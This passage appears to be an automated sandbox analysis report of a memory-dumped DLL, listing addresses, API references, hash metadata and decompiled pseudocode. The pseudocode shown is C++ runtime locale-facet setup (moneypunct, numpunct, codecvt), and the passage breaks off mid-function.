0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1
0x6e1cf664
0x6e1cf664
0x6e1cf667
0x6e1cf66b
0x6e1cf66f
0x6e1cf67c
0x6e1cf684
0x6e1cf686
0x00000000
0x6e1cf686
0x6e1cf64d
0x6e1cf64d
0x00000000
0x6e1cf64d
0x6e1cf64b
0x6e1cf5be
0x6e1cf5be
0x6e1cf5c1
0x6e1cf5c5
0x6e1cf5c9
0x6e1cf5d6
0x6e1cf5de
0x6e1cf5e0
0x00000000
0x6e1cf5e0
0x6e1cf5a7
0x6e1cf5a7
0x00000000
0x6e1cf5a7
0x6e1cf5a5

APIs

__EH_prolog3.LIBCMT ref: 6E1CF56E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF578
int.LIBCPMT ref: 6E1CF58F

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF5B2
std::_Facet_Register.LIBCPMT ref: 6E1CF5C9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF5E9
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF607

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 7f4e8fe458faf383fdd8b751d196ba481d7390a2ddf8159ac607aa961d15fa69
Instruction ID: 5f531cba4c54a54ad4b06b08ad355e64a76451c48a0fb9a121d26e8475a6ab91
Opcode Fuzzy Hash: 7f4e8fe458faf383fdd8b751d196ba481d7390a2ddf8159ac607aa961d15fa69
Instruction Fuzzy Hash: 071127B59105198BCF01DFE4C854AFEB37ABFA4B14F244508D520AB290DF789D84E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA2F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1CA2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t52 =  *0x6e286cd4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6E1A161C(0x6e286cc0);
				_t40 = _a8;
				_t22 = E6E1A171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CAB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6E1A1438(_t44);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6e22ba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t50);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6e286cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CA2F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA302
int.LIBCPMT ref: 6E1CA319

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

numpunct.LIBCPMT ref: 6E1CA33C
std::_Facet_Register.LIBCPMT ref: 6E1CA353
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA373
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA391

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 456846d47ead52b5371961121d9dd9f98fb6f257750a7053a9ed8d713976cf31
Instruction ID: 735cae5e3a60efc266a16dcbe2ab7a3f6c9004252164c8788c6eb04a0768748b
Opcode Fuzzy Hash: 456846d47ead52b5371961121d9dd9f98fb6f257750a7053a9ed8d713976cf31
Instruction Fuzzy Hash: F611597591052C8FCF02DBE4C858AFEB77AAF65B14F140808E111E7290DF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA059, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CA059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				void* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t103;
				void* _t116;
				void* _t129;
				intOrPtr* _t196;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				void* _t224;

				_t212 = __edx;
				_t161 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t220 =  *0x6e286cd8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t220;
				_t77 = E6E1A161C(0x6e286cc4);
				_t164 = _a8;
				_t78 = E6E1A171B(_a8, _t77);
				_t214 = _t78;
				if(_t78 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t214);
				} else {
					if(_t220 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CA96A(__ebx, _t164, __edx, _t214, _t220) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438( &_v32);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t214, _t220, 0x14);
							E6E1C6653( &_v20, 0);
							_t221 =  *0x6e286cc8; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t221;
							_t90 = E6E1A161C(0x6e286b38);
							_t171 = _a8;
							_t215 = E6E1A171B(_a8, _t90);
							__eflags = _t215;
							if(_t215 != 0) {
								L12:
								E6E1C66BA( &_v20);
								return E6E1E0075(_t215);
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E1CA9D2(_t161, _t171, __edx, _t215, _t221) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438( &_v32);
										E6E1E3D74( &_v32, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t161, _t215, _t221, 0x14);
										E6E1C6653( &_v20, 0);
										_t222 =  *0x6e286ccc; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t222;
										_t103 = E6E1A161C(0x6e286cb8);
										_t178 = _a8;
										_t216 = E6E1A171B(_a8, _t103);
										__eflags = _t216;
										if(_t216 != 0) {
											L19:
											E6E1C66BA( &_v20);
											return E6E1E0075(_t216);
										} else {
											__eflags = _t222;
											if(_t222 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E1CAA38(_t161, _t178, __edx, _t216, _t222) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438( &_v32);
													E6E1E3D74( &_v32, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t161, _t216, _t222, 0x14);
													E6E1C6653( &_v20, 0);
													_t223 =  *0x6e286cd0; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t223;
													_t116 = E6E1A161C(0x6e286cbc);
													_t185 = _a8;
													_t217 = E6E1A171B(_a8, _t116);
													__eflags = _t217;
													if(_t217 != 0) {
														L26:
														E6E1C66BA( &_v20);
														return E6E1E0075(_t217);
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E1CAAA0(_t161, _t185, _t212, _t217, _t223) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438( &_v32);
																E6E1E3D74( &_v32, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t161, _t217, _t223, 0x14);
																E6E1C6653( &_v20, 0);
																_t224 =  *0x6e286cd4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t224;
																_t129 = E6E1A161C(0x6e286cc0);
																_t192 = _a8;
																_t218 = E6E1A171B(_a8, _t129);
																__eflags = _t218;
																if(_t218 != 0) {
																	L33:
																	E6E1C66BA( &_v20);
																	return E6E1E0075(_t218);
																} else {
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E6E1CAB08(_t161, _t192, _t212, _t218, _t224) - 0xffffffff;
																		if(__eflags == 0) {
																			_t196 =  &_v32;
																			E6E1A1438(_t196);
																			E6E1E3D74( &_v32, 0x6e283504);
																			asm("int3");
																			_push(_t196);
																			 *((intOrPtr*)(_t196 + 4)) = _v12;
																			_v28 = _t196;
																			 *_t196 = 0x6e22ba24;
																			return _t196;
																		} else {
																			_t218 = _v16;
																			_v16 = _t218;
																			_v4 = 1;
																			E6E1C6FD3(__eflags, _t218);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 4))))();
																			 *0x6e286cd4 = _t218;
																			goto L33;
																		}
																	} else {
																		_t218 = _t224;
																		goto L33;
																	}
																}
															} else {
																_t217 = _v16;
																_v16 = _t217;
																_v4 = 1;
																E6E1C6FD3(__eflags, _t217);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4))))();
																 *0x6e286cd0 = _t217;
																goto L26;
															}
														} else {
															_t217 = _t223;
															goto L26;
														}
													}
												} else {
													_t216 = _v16;
													_v16 = _t216;
													_v4 = 1;
													E6E1C6FD3(__eflags, _t216);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t216 + 4))))();
													 *0x6e286ccc = _t216;
													goto L19;
												}
											} else {
												_t216 = _t222;
												goto L19;
											}
										}
									} else {
										_t215 = _v16;
										_v16 = _t215;
										_v4 = 1;
										E6E1C6FD3(__eflags, _t215);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t215 + 4))))();
										 *0x6e286cc8 = _t215;
										goto L12;
									}
								} else {
									_t215 = _t221;
									goto L12;
								}
							}
						} else {
							_t214 = _v16;
							_v16 = _t214;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t214);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t214 + 4))))();
							 *0x6e286cd8 = _t214;
							goto L5;
						}
					} else {
						_t214 = _t220;
						goto L5;
					}
				}
			}

0x6e1ca059
0x6e1ca059
0x6e1ca060
0x6e1ca06a
0x6e1ca06f
0x6e1ca07a
0x6e1ca07e
0x6e1ca081
0x6e1ca086
0x6e1ca08a
0x6e1ca08f
0x6e1ca093
0x6e1ca0d8
0x6e1ca0db
0x6e1ca0e7
0x6e1ca095
0x6e1ca097
0x6e1ca09d
0x6e1ca0a3
0x6e1ca0ab
0x6e1ca0ae
0x6e1ca0eb
0x6e1ca0f9
0x6e1ca0fe
0x6e1ca106
0x6e1ca110
0x6e1ca115
0x6e1ca120
0x6e1ca124
0x6e1ca127
0x6e1ca12c
0x6e1ca135
0x6e1ca137
0x6e1ca139
0x6e1ca17e
0x6e1ca181
0x6e1ca18d
0x6e1ca13b
0x6e1ca13b
0x6e1ca13d
0x6e1ca143
0x6e1ca149
0x6e1ca151
0x6e1ca154
0x6e1ca191
0x6e1ca19f
0x6e1ca1a4
0x6e1ca1ac
0x6e1ca1b6
0x6e1ca1bb
0x6e1ca1c6
0x6e1ca1ca
0x6e1ca1cd
0x6e1ca1d2
0x6e1ca1db
0x6e1ca1dd
0x6e1ca1df
0x6e1ca224
0x6e1ca227
0x6e1ca233
0x6e1ca1e1
0x6e1ca1e1
0x6e1ca1e3
0x6e1ca1e9
0x6e1ca1ef
0x6e1ca1f7
0x6e1ca1fa
0x6e1ca237
0x6e1ca245
0x6e1ca24a
0x6e1ca252
0x6e1ca25c
0x6e1ca261
0x6e1ca26c
0x6e1ca270
0x6e1ca273
0x6e1ca278
0x6e1ca281
0x6e1ca283
0x6e1ca285
0x6e1ca2ca
0x6e1ca2cd
0x6e1ca2d9
0x6e1ca287
0x6e1ca287
0x6e1ca289
0x6e1ca28f
0x6e1ca295
0x6e1ca29d
0x6e1ca2a0
0x6e1ca2dd
0x6e1ca2eb
0x6e1ca2f0
0x6e1ca2f8
0x6e1ca302
0x6e1ca307
0x6e1ca312
0x6e1ca316
0x6e1ca319
0x6e1ca31e
0x6e1ca327
0x6e1ca329
0x6e1ca32b
0x6e1ca370
0x6e1ca373
0x6e1ca37f
0x6e1ca32d
0x6e1ca32d
0x6e1ca32f
0x6e1ca335
0x6e1ca33b
0x6e1ca343
0x6e1ca346
0x6e1ca380
0x6e1ca383
0x6e1ca391
0x6e1ca396
0x6e1ca39a
0x6e1ca39e
0x6e1ca3a3
0x6e1ca3a6
0x6e1ca3ad
0x6e1ca348
0x6e1ca348
0x6e1ca34b
0x6e1ca34f
0x6e1ca353
0x6e1ca360
0x6e1ca368
0x6e1ca36a
0x00000000
0x6e1ca36a
0x6e1ca331
0x6e1ca331
0x00000000
0x6e1ca331
0x6e1ca32f
0x6e1ca2a2
0x6e1ca2a2
0x6e1ca2a5
0x6e1ca2a9
0x6e1ca2ad
0x6e1ca2ba
0x6e1ca2c2
0x6e1ca2c4
0x00000000
0x6e1ca2c4
0x6e1ca28b
0x6e1ca28b
0x00000000
0x6e1ca28b
0x6e1ca289
0x6e1ca1fc
0x6e1ca1fc
0x6e1ca1ff
0x6e1ca203
0x6e1ca207
0x6e1ca214
0x6e1ca21c
0x6e1ca21e
0x00000000
0x6e1ca21e
0x6e1ca1e5
0x6e1ca1e5
0x00000000
0x6e1ca1e5
0x6e1ca1e3
0x6e1ca156
0x6e1ca156
0x6e1ca159
0x6e1ca15d
0x6e1ca161
0x6e1ca16e
0x6e1ca176
0x6e1ca178
0x00000000
0x6e1ca178
0x6e1ca13f
0x6e1ca13f
0x00000000
0x6e1ca13f
0x6e1ca13d
0x6e1ca0b0
0x6e1ca0b0
0x6e1ca0b3
0x6e1ca0b7
0x6e1ca0bb
0x6e1ca0c8
0x6e1ca0d0
0x6e1ca0d2
0x00000000
0x6e1ca0d2
0x6e1ca099
0x6e1ca099
0x00000000
0x6e1ca099
0x6e1ca097

APIs

__EH_prolog3.LIBCMT ref: 6E1CA060
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA06A
int.LIBCPMT ref: 6E1CA081

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

codecvt.LIBCPMT ref: 6E1CA0A4
std::_Facet_Register.LIBCPMT ref: 6E1CA0BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA0DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA0F9

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 6c0233284617a88496a789714a59c5e73494fe97c8675e313c3bf580882d9c68
Instruction ID: 9f3d7afc96278260b153884b24c126f4897c3fe65938d2a81a9c8dafa1618b13
Opcode Fuzzy Hash: 6c0233284617a88496a789714a59c5e73494fe97c8675e313c3bf580882d9c68
Instruction Fuzzy Hash: B9112C7591052DCBCF02DBE4C858AFDB77ABF64B14F144808D511EB290DF789988E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF183, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF183(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;

				_t756 = __edx;
				_t575 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t814 - 0x14, 0);
				_t777 =  *0x6e286de8; // 0x0
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6E1A161C(0x6e286d94);
				_t578 =  *((intOrPtr*)(_t814 + 8));
				_t266 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6E1C66BA(_t814 - 0x14);
					return E6E1E0075(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6E1D0EB7(__ebx, _t578, __edx, _t758, _t777) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t814 - 0x20);
							E6E1E3D74(_t814 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t758, _t777, 0x14);
							E6E1C6653(_t814 - 0x14, 0);
							_t778 =  *0x6e286db8; // 0x0
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6E1A161C(0x6e286d6c);
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6E1C66BA(_t814 - 0x14);
								return E6E1E0075(_t759);
							} else {
								__eflags = _t778;
								if(_t778 == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6E1D0F1F(_t575, _t585, __edx, _t759, _t778) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t814 - 0x20);
										E6E1E3D74(_t814 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t575, _t759, _t778, 0x14);
										E6E1C6653(_t814 - 0x14, 0);
										_t779 =  *0x6e286dec; // 0x0
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6E1A161C(0x6e286d98);
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6E1C66BA(_t814 - 0x14);
											return E6E1E0075(_t760);
										} else {
											__eflags = _t779;
											if(_t779 == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6E1D0F87(_t575, _t592, __edx, _t760, _t779) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t814 - 0x20);
													E6E1E3D74(_t814 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t575, _t760, _t779, 0x14);
													E6E1C6653(_t814 - 0x14, 0);
													_t780 =  *0x6e286dbc; // 0x0
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6E1A161C(0x6e286d70);
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6E1C66BA(_t814 - 0x14);
														return E6E1E0075(_t761);
													} else {
														__eflags = _t780;
														if(_t780 == 0) {
															_push( *((intOrPtr*)(_t814 + 8)));
															_push(_t814 - 0x10);
															__eflags = E6E1D0FEF(_t575, _t599, _t756, _t761, _t780) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t814 - 0x20);
																E6E1E3D74(_t814 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t575, _t761, _t780, 0x14);
																E6E1C6653(_t814 - 0x14, 0);
																_t781 =  *0x6e286df0; // 0x0
																 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																 *(_t814 - 0x10) = _t781;
																_t317 = E6E1A161C(0x6e286d9c);
																_t606 =  *((intOrPtr*)(_t814 + 8));
																_t762 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t317);
																__eflags = _t762;
																if(_t762 != 0) {
																	L33:
																	E6E1C66BA(_t814 - 0x14);
																	return E6E1E0075(_t762);
																} else {
																	__eflags = _t781;
																	if(_t781 == 0) {
																		_push( *((intOrPtr*)(_t814 + 8)));
																		_push(_t814 - 0x10);
																		__eflags = E6E1D1057(_t575, _t606, _t756, _t762, _t781) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t814 - 0x20);
																			E6E1E3D74(_t814 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t575, _t762, _t781, 0x14);
																			E6E1C6653(_t814 - 0x14, 0);
																			_t782 =  *0x6e286dc0; // 0x0
																			 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																			 *(_t814 - 0x10) = _t782;
																			_t330 = E6E1A161C(0x6e286d74);
																			_t613 =  *((intOrPtr*)(_t814 + 8));
																			_t763 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t330);
																			__eflags = _t763;
																			if(_t763 != 0) {
																				L40:
																				E6E1C66BA(_t814 - 0x14);
																				return E6E1E0075(_t763);
																			} else {
																				__eflags = _t782;
																				if(_t782 == 0) {
																					_push( *((intOrPtr*)(_t814 + 8)));
																					_push(_t814 - 0x10);
																					__eflags = E6E1D10BF(_t575, _t613, _t756, _t763, _t782) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t814 - 0x20);
																						E6E1E3D74(_t814 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t575, _t763, _t782, 0x14);
																						E6E1C6653(_t814 - 0x14, 0);
																						_t783 =  *0x6e286df8; // 0x0
																						 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																						 *(_t814 - 0x10) = _t783;
																						_t343 = E6E1A161C(0x6e286da4);
																						_t620 =  *((intOrPtr*)(_t814 + 8));
																						_t764 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t343);
																						__eflags = _t764;
																						if(_t764 != 0) {
																							L47:
																							E6E1C66BA(_t814 - 0x14);
																							return E6E1E0075(_t764);
																						} else {
																							__eflags = _t783;
																							if(_t783 == 0) {
																								_push( *((intOrPtr*)(_t814 + 8)));
																								_push(_t814 - 0x10);
																								__eflags = E6E1D1127(_t575, _t620, _t756, _t764, _t783) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t814 - 0x20);
																									E6E1E3D74(_t814 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t575, _t764, _t783, 0x14);
																									E6E1C6653(_t814 - 0x14, 0);
																									_t784 =  *0x6e286df4; // 0x0
																									 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																									 *(_t814 - 0x10) = _t784;
																									_t356 = E6E1A161C(0x6e286da0);
																									_t627 =  *((intOrPtr*)(_t814 + 8));
																									_t765 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t356);
																									__eflags = _t765;
																									if(_t765 != 0) {
																										L54:
																										E6E1C66BA(_t814 - 0x14);
																										return E6E1E0075(_t765);
																									} else {
																										__eflags = _t784;
																										if(_t784 == 0) {
																											_push( *((intOrPtr*)(_t814 + 8)));
																											_push(_t814 - 0x10);
																											__eflags = E6E1D11AB(_t575, _t627, _t756, _t765, _t784) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t814 - 0x20);
																												E6E1E3D74(_t814 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t575, _t765, _t784, 0x14);
																												E6E1C6653(_t814 - 0x14, 0);
																												_t785 =  *0x6e286dc8; // 0x0
																												 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																												 *(_t814 - 0x10) = _t785;
																												_t369 = E6E1A161C(0x6e286d7c);
																												_t634 =  *((intOrPtr*)(_t814 + 8));
																												_t766 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t369);
																												__eflags = _t766;
																												if(_t766 != 0) {
																													L61:
																													E6E1C66BA(_t814 - 0x14);
																													return E6E1E0075(_t766);
																												} else {
																													__eflags = _t785;
																													if(_t785 == 0) {
																														_push( *((intOrPtr*)(_t814 + 8)));
																														_push(_t814 - 0x10);
																														__eflags = E6E1D1230(_t575, _t634, _t756, _t766, _t785) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t814 - 0x20);
																															E6E1E3D74(_t814 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t575, _t766, _t785, 0x14);
																															E6E1C6653(_t814 - 0x14, 0);
																															_t786 =  *0x6e286dc4; // 0x0
																															 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																															 *(_t814 - 0x10) = _t786;
																															_t382 = E6E1A161C(0x6e286d78);
																															_t641 =  *((intOrPtr*)(_t814 + 8));
																															_t767 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t382);
																															__eflags = _t767;
																															if(_t767 != 0) {
																																L68:
																																E6E1C66BA(_t814 - 0x14);
																																return E6E1E0075(_t767);
																															} else {
																																__eflags = _t786;
																																if(_t786 == 0) {
																																	_push( *((intOrPtr*)(_t814 + 8)));
																																	_push(_t814 - 0x10);
																																	__eflags = E6E1D12B4(_t575, _t641, _t756, _t767, _t786) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t814 - 0x20);
																																		E6E1E3D74(_t814 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t575, _t767, _t786, 0x14);
																																		E6E1C6653(_t814 - 0x14, 0);
																																		_t787 =  *0x6e286dd8; // 0x0
																																		 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																		 *(_t814 - 0x10) = _t787;
																																		_t395 = E6E1A161C(0x6e286d84);
																																		_t648 =  *((intOrPtr*)(_t814 + 8));
